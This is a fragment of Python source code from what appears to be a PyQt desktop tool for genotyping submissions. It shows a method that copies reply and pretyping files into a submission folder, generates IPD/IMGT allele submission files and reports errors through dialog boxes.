"""catches mapping between local_name and other info not displayed in the GUI
for use in befund-part of IPD file
"""
self.log.debug("Caught mapping between {} allele names and their addiditonal info".format(len(allele_dic)))
self.allele_dic = allele_dic # format: {local_name : TargetAllele}
@pyqtSlot()
def make_IPD_files(self):
"""tell typeloader to create the IPD file
"""
self.submit_btn.setChecked(False)
success = self.get_values()
if not success:
return False
project_dir = os.path.join(self.settings["projects_dir"], self.project)
mydir = os.path.join(project_dir, "IPD-submissions", self.subm_id)
os.makedirs(mydir, exist_ok=True)
try:
for myfile in [self.ENA_reply_file, self.pretypings]:
new_path = os.path.join(mydir, os.path.basename(myfile))
shutil.copy(myfile, new_path)
myfile = new_path
self.log.debug("Creating IPD file...")
self.get_chosen_samples()
self.get_files()
results = MIF.write_imgt_files(project_dir, self.samples, self.file_dic, self.allele_dic, self.ENA_id_map,
self.ENA_gene_map, self.pretypings, self.subm_id,
mydir, self.settings, self.log)
if not results[0]:
if results[1] == "Invalid pretypings":
self.handle_invalid_pretyings(results[2])
return False
elif results[1] == "Multiple novel alleles in target locus":
self.handle_multiple_novel_alleles(results[2])
return False
else:
if "is currently creating IPD files" in results[1]:
mbox = IPDCounterLockedDialog(self, "IPD file creation error", results[1], self.settings,
self.log)
mbox.remove_lock.connect(self.handle_IPDcounter_lock)
return False
else:
print("MIF.write_imgt_files result:")
print(results)
QMessageBox.warning(self, "IPD file creation error", results[1])
return False
else:
(self.IPD_file, self.cell_lines, self.customer_dic, resultText, self.imgt_files, success,
error) = results
if error:
QMessageBox.warning(self, "IPD file creation error",
"An error occurred during the creation of IPD files:\n\n{}".format(repr(error)))
return False
if success:
if not resultText:
resultText = "All genes and alleles were resolved"
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.